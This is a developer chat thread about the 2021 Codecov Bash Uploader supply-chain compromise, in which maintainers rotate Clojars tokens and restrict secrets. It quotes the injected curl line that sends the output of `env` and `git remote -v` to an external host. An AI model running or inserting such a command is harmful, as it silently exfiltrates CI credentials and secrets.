re: code coverage, geez, I'm happy I disabled this service a while ago. https://www.security.nl/posting/699462/Script+softwarebedrijf+Codecov+twee+maandenlang+voorzien+van+malware
From https://about.codecov.io/security-update/: > Out of an abundance of caution, if you used the Bash Uploaders between January 31, 2021 and April 1, 2021 and did not conduct a checksum validation of the Bash Uploader, we would suggest you re-roll all of your credentials, tokens, or keys located in the environment variables in your CI process.
Note: I do use codecov from clj-commons/rewrite-clj.
And did you get an e-mail? Or did you not use this script?
Yup, https://github.com/clj-commons/rewrite-clj/blob/7621126caae5f21dc5150d52a6c9b747dc0aeeff/.github/workflows/code-coverage.yml#L49. Since this is a clj-commons project it might not be me who would get an email.
Perhaps someone else got an e-mail, @slipset?
But I also used it for rewrite-cljc I think during their window of infection… still no email… so… but they are recommending an update of credentials regardless…
Their bash script was altered to upload the env vars: > curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https://<redacted>/upload/v2 || true
:(
do you have sensitive env vars set in those projects?
e.g. clojars deploy tokens?
Ya… there are the CLOJARS tokens. I’ll refresh those. Not sure what else I need to change for GitHub Actions.
I’ll review codecov docs to see if they’ve updated how their uploader script should be used as well.
Ya they https://docs.codecov.io/docs/about-the-codecov-bash-uploader#validating-the-bash-script script now. I’ll also add that in.
Ok, there’s also a newish feature up on GitHub. You can create an environment for a repo. This environment can hold secrets and can be referenced by a GitHub Actions workflow. So I deleted the repo-scoped deployment secrets, and now have a release environment that only the release workflow has access to.
👍
I did get the email. I guess I need to cycle the Clojars token we use for deploys. Possibly also the cert I use for signing artefacts.
eh yes....
the entire clj-commons could be compromised this way?
Ah, but no. rewrite-clj uses github actions, none of the other clj-commons projects do that. They use circle. And none of the other clj-commons projects use codecov
I’ve already cycled deploy tokens for rewrite-clj
@slipset but none of the rewrite-clj secrets, etc are used in other projects? like the cert?
Nope. Rewrite doesn’t sign AFAIK, and the deploy tokens are generated by @lee, so they are different from the the ones I use.
Yup, correct, rewrite-clj does not sign.
ok, all good then, thanks
Thank you for checking.